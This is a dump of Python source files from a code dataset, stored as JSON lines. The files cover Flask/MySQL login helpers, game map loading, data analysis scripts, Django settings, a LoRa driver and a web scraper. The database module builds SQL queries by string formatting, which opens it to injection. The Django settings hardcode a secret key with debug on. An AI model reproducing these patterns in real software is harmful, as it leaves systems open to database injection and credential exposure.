Screen.change(ChoiceScreen)\n\ntest()\n","sub_path":"demos/scale_ctrl_test.py","file_name":"scale_ctrl_test.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"7036655","text":"from flask import url_for, redirect\nimport pymysql, hashlib\n\nclass Database:\n global keyId\n keyId = '_USER_'\n def __init__(self,db = 'crm'):\n self.conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='', database=db)\n \n def connection(self):\n return self.conn\n\n def getcursor(self):\n self.cursor = self.conn.cursor(pymysql.cursors.DictCursor)\n return self.cursor\n\n def initial_setup(self):\n sql = open('app/crm.sql').read()\n\n split = sql.split(';')\n\n for i in range(0,len(split)):\n split[i] = split[i].replace('\\n',' ')\n\n del split[-1]\n\n for sql in split:\n db = self.conn.cursor()\n db.execute(sql)\n self.conn.commit()\n return 1\n\n # VerifyRfid will only allow the authentic user to open dashboard, contacts...\n def VerifyRfid(self, browserId, em):\n if self.conn:\n cur = self.conn.cursor()\n query = cur.execute(\"\"\" SELECT EMAIL, RFID FROM `login_main` WHERE EMAIL='{}' AND RFID='{}' \"\"\".format(em, browserId))\n if query == True:\n return True\n else:\n return False\n\n\n def get_username(self, rfid):\n if rfid is not None:\n if self.conn:\n cur = self.conn.cursor(pymysql.cursors.DictCursor)\n status = cur.execute(\"\"\"SELECT USERNAME FROM `login_main` WHERE RFID = '{}' \"\"\".format(rfid))\n\n if status > 0:\n data = cur.fetchone()\n return data['USERNAME']\n\n\n\n\n\n\n\n\n \n","sub_path":"app/model/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294293749","text":"###################################\n## Driftwood 2D Game Dev. Suite ##\n## map.py ##\n## Copyright 2014 PariahSoft LLC ##\n###################################\n\n## **********\n## Permission is hereby granted, free of charge, to any person obtaining a copy\n## of this software and associated documentation files (the \"Software\"), to\n## deal in the Software without restriction, including without limitation the\n## rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n## sell copies of the Software, and to permit persons to whom the Software is\n## furnished to do so, subject to the following conditions:\n##\n## The above copyright notice and this permission notice shall be included in\n## all copies or substantial portions of the Software.\n##\n## THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n## FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n## IN THE SOFTWARE.\n## **********\n\nimport layer\nimport tileset\n\n\nclass Tilemap:\n \"\"\"This class reads the Tiled map file for the currently focused area, and presents an abstraction.\n\n Attributes:\n area: Parent AreaManager instance.\n\n width: Width of the map in tiles.\n height: Height of the map in tiles.\n tilewidth: Width of tiles in the map.\n tileheight: Height of tiles in the map.\n properties: A dictionary containing map properties.\n\n layers: The list of Layer class instances for each layer.\n tilesets: The list of Tileset class instances for each tileset.\n \"\"\"\n\n def __init__(self, area):\n \"\"\"Tilemap class initializer.\n\n Args:\n area: Link back to the parent AreaManager instance.\n \"\"\"\n self.area = area\n\n # Attributes which will be updated with information about the map.\n self.width = 0\n self.height = 0\n self.tilewidth = 0\n self.tileheight = 0\n self.properties = {}\n\n self.layers = []\n self.tilesets = []\n\n # This contains the JSON of the Tiled map.\n self.__tilemap = {}\n\n def _read(self, data):\n \"\"\"Read and abstract a Tiled map.\n\n Reads the JSON Tiled map and processes its information into useful abstractions. This method is marked private\n even though it's called from AreaManager, because it must only be called once per area focus.\n\n Args:\n data: JSON contents of the Tiled map.\n \"\"\"\n # Reset variables left over from the last map.\n if self.layers:\n self.layers = []\n if self.tilesets:\n self.tilesets = []\n\n # Load the JSON data.\n self.__tilemap = data\n\n # Set class attributes representing information about the map.\n self.width = self.__tilemap[\"width\"]\n self.height = self.__tilemap[\"height\"]\n self.tilewidth = self.__tilemap[\"tilewidth\"]\n self.tileheight = self.__tilemap[\"tileheight\"]\n if \"properties\" in self.__tilemap:\n self.properties = self.__tilemap[\"properties\"]\n\n # Call the on_enter event if set.\n if \"on_enter\" in self.properties:\n self.area.driftwood.script.call(*self.properties[\"on_enter\"].split(':'))\n\n # Set the window title.\n if \"title\" in self.properties:\n self.area.driftwood.window.title(self.properties[\"title\"])\n\n # Build the tileset abstractions.\n for ts in self.__tilemap[\"tilesets\"]:\n self.tilesets.append(tileset.Tileset(self, ts))\n\n # Global object layer.\n gobjlayer = {}\n\n # Build the tile and layer abstractions.\n for zpos, l in enumerate(self.__tilemap[\"layers\"]):\n # This layer is marked invisible, skip it.\n if not l[\"visible\"]:\n continue\n\n # This is a tile layer.\n if l[\"type\"] == \"tilelayer\":\n self.layers.append(layer.Layer(self, l, zpos))\n\n # This is an object layer.\n elif l[\"type\"] == \"objectgroup\":\n # If this is the very first layer, it's the global object layer.\n if not self.layers:\n gobjlayer = l\n\n else:\n self.layers[-1]._process_objects(l)\n\n # Merge the global object layer into all tile layers.\n if gobjlayer:\n for l in self.layers:\n l._process_objects(gobjlayer)\n","sub_path":"src/tilemap.py","file_name":"tilemap.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"595931935","text":"# Read in the data.\r\nimport csv\r\n\r\nf = open('D:\\dataquest\\projects\\hacker_news.csv')\r\nhn = list(csv.reader(f))\r\nhn[:5]\r\nheaders = hn[0]\r\nhn = hn[1:]\r\nprint(headers)\r\nprint(hn[:5])\r\n# Identify posts that begin with either `Ask HN` or `Show HN` and separate the data into different lists.\r\nask_posts = []\r\nshow_posts =[]\r\nother_posts = []\r\n\r\nfor post in hn:\r\n title = post[1]\r\n if title.lower().startswith(\"ask hn\"):\r\n ask_posts.append(post)\r\n elif title.lower().startswith(\"show hn\"):\r\n show_posts.append(post)\r\n else:\r\n other_posts.append(post)\r\n \r\nprint(len(ask_posts))\r\nprint(len(show_posts))\r\nprint(len(other_posts))\r\n\r\n# Calculate the average number of comments `Ask HN` posts receive.\r\ntotal_ask_comments = 0\r\n\r\nfor post in ask_posts:\r\n total_ask_comments += int(post[4])\r\n \r\navg_ask_comments = total_ask_comments / len(ask_posts)\r\nprint(avg_ask_comments)\r\n\r\ntotal_show_comments = 0\r\n\r\nfor post in show_posts:\r\n total_show_comments += int(post[4])\r\n \r\navg_show_comments = total_show_comments / len(show_posts)\r\nprint(avg_show_comments)\r\n\r\n# Calculate the amount of ask posts created during each hour of day and the number of comments received.\r\nimport datetime as dt\r\n\r\nresult_list = []\r\n\r\nfor post in ask_posts:\r\n result_list.append(\r\n [post[6], int(post[4])]\r\n )\r\n\r\ncomments_by_hour = {}\r\ncounts_by_hour = {}\r\ndate_format = \"%m/%d/%Y %H:%M\"\r\n\r\nfor each_row in result_list:\r\n date = each_row[0]\r\n comment = each_row[1]\r\n time = dt.datetime.strptime(date, date_format).strftime(\"%H\")\r\n if time in counts_by_hour:\r\n comments_by_hour[time] += comment\r\n counts_by_hour[time] += 1\r\n else:\r\n comments_by_hour[time] = comment\r\n counts_by_hour[time] = 1\r\n\r\ncomments_by_hour\r\n\r\n# Calculate the average amount of comments `Ask HN` posts created at each hour of the day receive.\r\navg_by_hour = []\r\n\r\nfor hr in comments_by_hour:\r\n avg_by_hour.append([hr, comments_by_hour[hr] / counts_by_hour[hr]])\r\n\r\navg_by_hour\r\n\r\nswap_avg_by_hour = []\r\n\r\nfor row in avg_by_hour:\r\n swap_avg_by_hour.append([row[1], row[0]])\r\n \r\nprint(swap_avg_by_hour)\r\n\r\nsorted_swap = sorted(swap_avg_by_hour, reverse=True)\r\n\r\nsorted_swap\r\n\r\n# Sort the values and print the the 5 hours with the highest average comments.\r\n\r\nprint(\"Top 5 Hours for 'Ask HN' Comments\")\r\nfor avg, hr in sorted_swap[:5]:\r\n print(\r\n \"{}: {:.2f} average comments per post\".format(\r\n dt.datetime.strptime(hr, \"%H\").strftime(\"%H:%M\"),avg\r\n )\r\n )\r\n","sub_path":"hackerposts.py","file_name":"hackerposts.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"454672317","text":"# Copyright 2008 Google Inc. All Rights Reserved.\n\n# Django settings for CSSJanus.\n\n__author__ = 'elsigh@google.com (Lindsey Simon)'\n\nimport os\n\n# YOU NEED TO SET THIS VARIABLE TO POINT TO YOUR INSTALL PATH\nCSSJANUS_DIR = os.path.abspath(os.path.dirname(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nLANGUAGE_CODE = 'en'\nTIME_ZONE = 'US/Pacific'\n#DATABASE_ENGINE = 'sqlite3'\nUSE_I18N = True\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n)\ngettext = lambda s: s\nLANGUAGES = (\n ('ar', gettext('Arabic')),\n ('zh_CN', gettext('Chinese')),\n ('en', gettext('English')),\n ('fr', gettext('French')),\n ('he', gettext('Hebrew')),\n ('de', gettext('German')),\n ('ja', gettext('Japanese')),\n ('fa', gettext('Persian')),\n)\n\nTEMPLATE_DIRS = (\n CSSJANUS_DIR\n)\nADMINS = (\n ('Lindsey Simon', __author__),\n)\nMANAGERS = ADMINS\nUSE_ETAGS=True\nSECRET_KEY = 'jvs30_ok!o!gf)dfao)#r+jz$%^s%-mxwxy*$2fgj46-j@=i*c'\nROOT_URLCONF = 'django_urls'\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'cssjanus'\n)\nSESSION_ENGINE = 'gae_sessions'\n","sub_path":"django_settings.py","file_name":"django_settings.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"408145635","text":"import serial\nimport time\nclass lora:\n def __init__(self,port=\"/dev/ttyS0\",baudrate=9600,init=False):\n if init:self.init_lora_device(port)\n self.ser = serial.Serial(port,baudrate=baudrate,timeout=0.5)\n self.AT_command(\"AT+ADDRESS=6\",time_sleep=0.2)\n self.AT_command(\"AT+PARAMETER=12,7,1,4\",time_sleep=0.2)\n self.AT_command(\"AT+IPR=9600\",time_sleep=0.2)\n self.AT_command(\"AT+NETWORKID=6\",time_sleep=0.2)\n #self.AT_command(self.ser,\"AT+CPIN?\")\n \n def AT_command(self,cmd,time_sleep=1):\n # check AT command format\n cmd = cmd if cmd[-2:]==\"\\r\\n\" else cmd+\"\\r\\n\"\n self.ser.write(cmd.encode())\n time.sleep(time_sleep)\n print(f\"{cmd.split('=')[0][3:]} > {self.ser.read(10).decode('UTF-8')}\")\n \n def send(self,message,address=713):\n length = len(str(message))\n self.AT_command(f\"AT+SEND={address},{length},{message}\\r\\n\")\n \n def init_lora_device(self,port):\n s = serial.Serial(port,baudrate=115200)\n s.write(\"AT+IPR=9600\\r\\n\".encode())\n print(f\"init Done\")\n s.close()\n time.sleep(1)\n def close(self):\n self.ser.close()\n \n \n \n \nif __name__ == \"__main__\" :\n _lora = lora(init=True)\n for _ in range(10): _lora.send(\"send to 713\")\n _lora.close()\n ","sub_path":"Lora.py","file_name":"Lora.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"250913665","text":"import numpy as np\nimport cv2\n\ncamera = cv2.VideoCapture(0)\ncamera.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncamera.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\n# threshold: 입력이미지가 그레이 스케일 이미지여야 한다.\n\n# ADAPTIVE_THRESH_MEAN_C와 함께 adaptiveThreshold 함수를 사용하면 앞에서 검은색으로 검출된 부분의 글씨가 검출됩니다.\n# 첫번째 아규먼트는 원본 이미지, 두번째 아규먼트는 임계값 이상일 경우 픽셀값, 세번째 아규먼트는 적응형 이진화 타입,\n# 네번째 아규먼트는 이진화 타입, 다섯째 아규먼트는 임계값 계산시 함께 볼 주변 픽셀의 범위를 블럭 크기로 지정,\n# 여섯번째 아규먼트는 평균 또는 가중평균에서 뺄 값입니다.\n\nwhile True:\n\n ret, frame = camera.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 50, 150, apertureSize=3)\n lines = cv2.HoughLines(edges, 1, np.pi / 180, 100)\n\n ret, img_result1 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n ret, img_result2 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV)\n\n for i in range(len(lines)):\n print(i)\n for rho, theta in lines[i]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n\n cv2.line(img_result1, (x1, y1), (x2, y2), (0, 0, 255), 2)\n\n # ret, img_result2 = cv2.threshold(frame, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n cv2.imshow(\"VideoFrame\", frame)\n cv2.imshow(\"THRESH_BINARY\", img_result1)\n # cv2.imshow(\"THRESH_OTSU\", img_result2)\n\n if cv2.waitKey(1) > 0: break\n\ncamera.release()\ncv2.destroyAllWindows()\n","sub_path":"opencv/lineDetection.py","file_name":"lineDetection.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"79639995","text":"import jax.numpy as jnp\nimport pytest\n\nfrom gpjax.types import Dataset, NoneType, verify_dataset\n\n\ndef test_nonetype():\n assert isinstance(None, NoneType)\n\n\n@pytest.mark.parametrize(\"n\", [1, 10, 100])\n@pytest.mark.parametrize(\"outd\", [1, 2, 10])\n@pytest.mark.parametrize(\"ind\", [1, 2, 10])\ndef test_dataset(n, outd, ind):\n x = jnp.ones((n, ind))\n y = jnp.ones((n, outd))\n d = Dataset(X=x, y=y)\n verify_dataset(d)\n assert d.n == n\n assert d.in_dim == ind\n assert d.out_dim == outd\n\n\n@pytest.mark.parametrize(\"nx, ny\", [(1, 2), (2, 1), (10, 5), (5, 10)])\ndef test_dataset_assertions(nx, ny):\n x = jnp.ones((nx, 1))\n y = jnp.ones((ny, 1))\n with pytest.raises(AssertionError):\n ds = Dataset(X=x, y=y)\n verify_dataset(ds)\n\n\ndef test_y_none():\n x = jnp.ones((10, 1))\n d = Dataset(X=x)\n verify_dataset(d)\n assert d.y is None\n","sub_path":"tests/test_types.py","file_name":"test_types.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"297947438","text":"from dogLib import Dog\n\npup = Dog(__file__)\nprint(pup.__doc__)\n\n# print(pup.__file__)\n# hello there\n\nplist = pup.get_products()\nprint(plist)\n\ndataset = 'LANDSAT_8_C1'\n\nentlist = pup.hunt(path=47, row=26, product=dataset)\nfor it in entlist:\n print(it)\n\n\n# ------------------------------- LANDSAT 7 -------------------------\n\n\ndataset = 'LANDSAT_ETM_C1'\n\nentlist = pup.hunt(path=47, row=26, product=dataset)\nfor it in entlist:\n print(it)\n\n\n\n\n\n\n# ----------------------------------- LANDSAT 5 minus? ---------------------------\n\ndataset = 'LANDSAT_TM_C1'\n\nentlist = pup.hunt(path=47, row=26, product=dataset)\nfor it in entlist:\n print(it)\n\nprint(entlist[0])\n\n","sub_path":"test/simpleL8TestCase.py","file_name":"simpleL8TestCase.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"103447388","text":"\"\"\"\n Base class for UI Agents\n \n Also provides the system clock\n \n Created on 2010-08-19\n @author: jldupont\n\"\"\"\nimport gtk\nfrom Queue import Queue\nfrom jld_scripts.system import mswitch\nfrom jld_scripts.system.base import process_queues, message_processor\n\n__all__=[\"UiAgentBase\"]\n\nclass UiAgentBase(object):\n \n REFRESH_TIMEOUT=10\n LOW_PRIORITY_MESSAGE_BURST_SIZE=5\n \n def __init__(self, time_base):\n \"\"\"\n @param time_base: in milliseconds\n @param glade_file: absolute file path to the ui glade XML file\n @param ui_window_class: class object for the ui window \n \"\"\"\n self.time_base=time_base \n self.ticks_second=1000/time_base\n\n self.iq=Queue()\n self.isq=Queue()\n mswitch.subscribe(\"__main__\", self.iq, self.isq)\n\n self.tick_count=0\n self.sec_count=0\n self.min_count=0\n self.hour_count=0\n self.day_count=0\n\n self.window=None\n \n self.interests={}\n self.responsesInterests=[]\n \n \n def h_app_show(self, *_):\n \"\"\" We should show the main application window\n \"\"\"\n if self.window is None:\n self.window=self.ui_window_class(self.glade_file)\n self.do_updates()\n \n def h_app_close(self, *_):\n \"\"\" Seems that the application window was closed...\n \"\"\"\n self.window=None\n\n def h_app_exit(self, *_):\n self.on_destroy()\n\n def on_destroy(self):\n gtk.main_quit()\n \n def do_updates(self):\n \"\"\"\n The ui window must be updated\n \"\"\"\n raise RuntimeError(\"must be implemented\")\n\n def refreshUi(self):\n \"\"\"\n This can be subclassed - it will be called every REFRESH_TIMEOUT seconds\n \"\"\"\n\n def tick(self, *_):\n \"\"\"\n Performs message dispatch\n \"\"\"\n tick_min=False\n tick_hour=False\n tick_day=False\n tick_second = (self.tick_count % self.ticks_second) == 0 \n self.tick_count += 1\n \n if tick_second:\n self.sec_count += 1\n\n if (self.sec_count % self.REFRESH_TIMEOUT)==0:\n self.refreshUi()\n\n tick_min=(self.sec_count % 60)==0\n if tick_min:\n self.min_count += 1\n \n tick_hour=(self.min_count % 60)==0\n if tick_hour:\n self.hour_count += 1\n \n tick_day=(self.hour_count % 24)==0\n if tick_day:\n self.day_count += 1\n \n #print \"tick! \", tick_second\n mswitch.publish(\"__main__\", \"__tick__\", self.ticks_second, \n tick_second, tick_min, tick_hour, tick_day, \n self.sec_count, self.min_count, self.hour_count, self.day_count)\n \n #(src_agent, agent_name, agent_id, \n # interest_map, responsesInterestList, \n # iq, isq, processor, low_priority_burst_size=5)\n quit=process_queues(self, \"__main__\", \"__main__\", \n self.interests, self.responsesInterests,\n self.iq, self.isq, message_processor \n )\n if quit:\n self.on_destroy()\n \n \"\"\"\n while True:\n try: \n envelope=self.isq.get(False)\n quit, mtype, handled=mdispatch(self, \"__main__\", envelope)\n if handled==False:\n mswitch.publish(self.__class__, \"__interest__\", (mtype, False, self.isq))\n if quit:\n self.on_destroy()\n break\n \n except Empty:\n break\n continue \n \n burst=self.LOW_PRIORITY_MESSAGE_BURST_SIZE\n \n while True:\n try: \n envelope=self.iq.get(False)\n quit, mtype, handled=mdispatch(self, \"__main__\", envelope)\n if handled==False:\n mswitch.publish(self.__class__, \"__interest__\", (mtype, False, self.iq))\n if quit:\n self.on_destroy()\n break\n \n burst -= 1\n if burst == 0:\n break\n except Empty:\n break\n \n continue\n \"\"\"\n ## for gobject... just in case\n return True\n","sub_path":"src/jld_scripts/system/ui_base.py","file_name":"ui_base.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"472234455","text":"# 2D Array\n# a. Desc ­> A library for reading in 2D arrays of integers, doubles, or booleans from\n# standard input and printing them out to standard output.\n# b. I/P ­> M rows, N Cols, and M * N inputs for 2D Array. Use Java Scanner Class\n# c. Logic ­> create 2 dimensional array in memory to read in M rows and N cols\n# d. O/P ­> Print function to print 2 Dimensional Array. In Java use PrintWriter with\n# OutputStreamWriter to print the output to the screen.\n\ntry:\n rows = int(input(\"Enter number of Rows: \"))\n columns = int(input(\"Enter number of columns: \"))\nexcept ValueError:\n print(\"plz enter valid input\")\ndef twoD_array(rows, columns):\n array = []\n for i in range(rows):\n row = []\n for j in range(columns):\n value = int(input(\"Enter the value: \"))\n row.append(value)\n array.append(row)\n return array\n\nprint(twoD_array(rows,columns)) \n","sub_path":"2DArray.py","file_name":"2DArray.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"504432883","text":"import matplotlib as mpl\nmpl.use(\"TKAgg\")\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nreal_name=[\"千与千寻\",\"玩具总动员4\",\"黑衣人:全球追击\"]\n#票房\nreal_num1=[7548,4013,1673]\nreal_num2=[5453,1840,1080]\nreal_num3=[4348,2345,1890]\n\nx=np.arange(len(real_name))\nplt.bar(x,real_num1,alpha=0.5,width=0.3,label=real_name[0])\nplt.bar([i+0.3 for i in x],real_num2,alpha=0.5,width=0.3,label=real_name[1])\nplt.bar([i+0.6 for i in x],real_num3,alpha=0.5,width=0.3,label=real_name[2])\nx_label=[\"第一天\",\"第二天\",\"第三天\"]\nplt.xticks([i+0.3 for i in x],x_label)\nplt.ylabel(\"票房数\")\nplt.rcParams['font.sans-serif']=['SimHei']\nplt.legend()\nplt.title(\"三天三部电影票房数\")\nplt.show()","sub_path":"Matplotlib图形库/14.柱状图的使用.py","file_name":"14.柱状图的使用.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"114464653","text":"from django.db import models\nfrom MasterEntry.models import Designation,DanceCategory,District\n\n# Create your models here\nGender=(\n (\"M\",\"Male\"),\n (\"F\",\"Female\"),\n (\"O\",\"Others\"),\n)\n\nisActive=(\n (\"1\",\"Active\"),\n (\"0\",\"Not Active\"),\n)\n\n\nclass Tutor(models.Model):\n tutor_name=models.CharField(\"Name:\",max_length=20,null=False)\n tutor_contact=models.CharField(\"Conatct:\",max_length=11,null=False)\n tutor_email=models.EmailField(\"Email:\",unique=True,null=False,help_text=\"Enter Valid Email\")\n tutor_gender=models.CharField(\"Gender:\",max_length=5,choices=Gender,null=False)\n tutor_photo=models.ImageField(\"Tutor Photo:\",upload_to=\"TutorPhoto\",null=False)\n tutor_dob=models.DateField(\"Date of Birth:\",null=False)\n tutor_isactive=models.CharField(\"Is Active:\",max_length=5,choices=isActive,null=False,help_text=\"If Value is 1 Tutor is Active and Not Active if 0\")\n tutor_username=models.CharField(\"User name:\",max_length=15,unique=True,null=False)\n tutor_password=models.CharField(\"Password:\",max_length=15,unique=True,null=False)\n \n tutor_designation=models.ForeignKey(Designation,on_delete=models.SET_NULL,null=True,verbose_name=\"Designation:\")\n tutor_dancecategory=models.ForeignKey(DanceCategory,on_delete=models.SET_NULL,null=True,verbose_name=\"Dance Category:\")\n tutor_district=models.ForeignKey(District,on_delete=models.SET_NULL,null=True,verbose_name=\"District:\")\n\n def __str__(self):\n return f\"{self.tutor_name}-{self.tutor_designation}\"\n \n\nclass DanceCourses(models.Model):\n course_dancecategory=models.ForeignKey(DanceCategory,on_delete=models.SET_NULL,null=True,verbose_name=\"Dance Category:\")\n course_tutor=models.ForeignKey(Tutor,on_delete=models.SET_NULL,null=True,verbose_name=\"Tutor:\")\n \n course_name=models.CharField(\"Name:\",max_length=20,null=False)\n course_photo=models.ImageField(upload_to=\"CoursePhoto\",null=False)\n course_description=models.TextField(\"Description\")\n course_totalfees=models.CharField(\"Total Fees:\",max_length=20,null=False,)\n course_downpayment=models.CharField(\"Down Payment:\",max_length=20,null=False,help_text=\"Online Registration Amount:\")\n course_details=models.FileField(\"Course Syllabus:\",upload_to=\"CourseSyllabus\")\n course_remarks=models.TextField(\"Remarks\")\n \n\n\n\n","sub_path":"Administrator/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"389120728","text":"# Time: O(logn)\n# Space: O(logn)\n\n# 1104\n# In an infinite binary tree where every node has two children, nodes are labelled in row order.\n#\n# In the odd numbered rows (ie., the first, third, fifth,...), the labelling is left to right,\n# while in the even numbered rows (second, fourth, sixth,...), the labelling is right to left.\n# 1\n# 3 2\n# 4 5 6 7\n# 15 14 13 12 11 10 9 8\n#\n# Given the label of a node in this tree, return the labels in the path from the root of\n# the tree to the node with that label.\n\nclass Solution(object):\n def pathInZigZagTree(self, label):\n \"\"\"\n :type label: int\n :rtype: List[int]\n \"\"\"\n count = 2**label.bit_length()\n ans = []\n while label >= 1:\n ans.append(label)\n begin, end = count // 2, count - 1\n label = (begin + (end-label)) // 2\n count //= 2\n return ans[::-1]\n\n def pathInZigZagTree_ming(self, label): # similar but can improve over the above,\n # bit_length on each row doesn't need to campute each time\n ans = [label]\n while label > 1:\n k = label // 2\n b = k.bit_length()\n s, e = 2**(b-1), 2**b - 1\n label = s + (e - k)\n ans.append(label)\n ans.append(label)\n return ans[::-1]\n\nprint(Solution().pathInZigZagTree(14)) # [1,3,4,14]\nprint(Solution().pathInZigZagTree(26)) # [1,2,6,10,26]","sub_path":"Python/path-in-zigzag-labelled-binary-tree.py","file_name":"path-in-zigzag-labelled-binary-tree.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"226527910","text":"\"\"\"\nGeneCards Scraper\n\nThis script uses selenium to scrape the GeneCards database for information and output its results into a .xlsx file.\n\nNote: Chrome is required on the computer.\n\nInstallation:\n\n1. Run the following command to install all dependencies: pip3 install selenium xlsxwriter pandas openpyxl\n2. Install the correct version of the Chrome Driver.\n a) Find the Chrome version in Menu > Help > About Google Chrome.\n b) Go to https://pypi.org/project/chromedriver-binary/#history and find the closest version number to your Chrome version.\n c) Copy the install command on the specific version of the chromedriver and install like before.\n\nUsage:\n\npython3 210109_genecards_scrape.py \n\"\"\"\n\nimport argparse\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport chromedriver_binary\nimport xlsxwriter\nimport pandas as pd\nimport os\n\n# initalize command line argument parser\n\nparser = argparse.ArgumentParser(description=\"This script uses selenium to scrape the GeneCards database for information and output its results into a .xlsx file.\")\nparser.add_argument('path', type=str, help='path to target')\nargs = parser.parse_args()\n\n# open input sheet\n\ntry:\n df = pd.read_excel(args.path, 0)\n genes = df[\"Gene ID\"]\nexcept:\n print(\"There was an error opening the spreadsheet.\")\nelse:\n\n row = 0\n\n # initiate output sheet with formatting\n\n workbook = xlsxwriter.Workbook(os.path.splitext(args.path)[0] + '_scraped.xlsx')\n worksheet = workbook.add_worksheet('Sheet1')\n\n cell_format = workbook.add_format()\n bold = workbook.add_format({'bold': True})\n cell_format.set_text_wrap()\n cell_format.set_align(\"top\")\n\n worksheet.set_column(\"A:A\",30,cell_format)\n worksheet.set_column(\"B:B\",40,cell_format)\n worksheet.set_column(\"C:C\",70,cell_format)\n\n # open browser\n\n driver = webdriver.Chrome()\n\n # start through each gene\n\n for gene in genes:\n\n worksheet.write(row, 0, gene)\n\n # open website\n\n try:\n \n driver.get('https://www.genecards.org/cgi-bin/carddisp.pl?gene='+gene)\n #assert \"GeneCards\" in driver.title\n\n # find gene aliases\n\n titles = driver.find_element(By.ID, 'aliases_descriptions')\n columns = titles.find_elements(By.CLASS_NAME, 'gc-subsection')\n\n gene_string = \"\"\n\n columns = [columns[0]]\n\n for column in columns:\n\n item = column.find_elements(By.TAG_NAME, 'li')\n for title in item:\n\n title_nums = title.find_elements(By.TAG_NAME, 'a')\n num_strings = \"\"\n for super in title_nums:\n num_strings += \" \" + super.text\n\n real_title = title.text.replace(num_strings, \"\")\n\n gene_string += real_title + \"\\n\"\n\n # write aliases to sheet\n\n worksheet.write(row, 1, gene_string[0:-1])\n\n # find summaries\n\n summaries = driver.find_element(By.ID, 'summaries')\n summaries = summaries.find_elements(By.CLASS_NAME, 'gc-subsection')\n\n summary_array = []\n\n for summary in summaries:\n\n title = summary.find_element(By.TAG_NAME, 'h3')\n\n if title.text != \"\":\n summary_array.append(bold)\n summary_array.append(title.text)\n\n body = summary.text.replace(title.text, '')\n \n summary_array.append(body + \"\\n\\n\")\n\n # remove extra new lines\n\n ind = len(summary_array)-1\n\n if summary_array[ind] == \"\\n\\n\":\n summary_array.pop(ind)\n else:\n summary_array[ind] = summary_array[ind][0:-4]\n\n # write summary to sheet\n\n worksheet.write_rich_string(row, 2, *summary_array)\n \n print(\"Completed: \"+ gene + \" [\" + str(row+1) + \"/\" + str(len(genes)) + \"]\")\n \n except:\n \n print(\"There was an error processing: \" + gene)\n\n # increment row\n\n row += 1\n\n # close programs\n\n driver.quit()\n workbook.close()","sub_path":"genecards-scrape/production/210109_genecards_scrape.py","file_name":"210109_genecards_scrape.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98841209","text":"class Config(object):\n def __init__(self, cfile):\n from json import loads\n config = loads(open(cfile).read())\n \n self.service = config['SERVICE']\n self.index = config['INDEX']\n self.version = config['VERSION']\n self.key = config['KEY']\n self.query = config['QUERY']\n self.output = config['OUTPUT']\n self.fields = config['FIELDS']\n self.dataset = config['DATASET']\n self.columns = config['COLUMNS']\n\nclass Crawler(object):\n def __init__(self, service, index, version):\n self.service = service\n self.index = index\n self.version = version\n \n self.url = 'https://' + service +\\\n 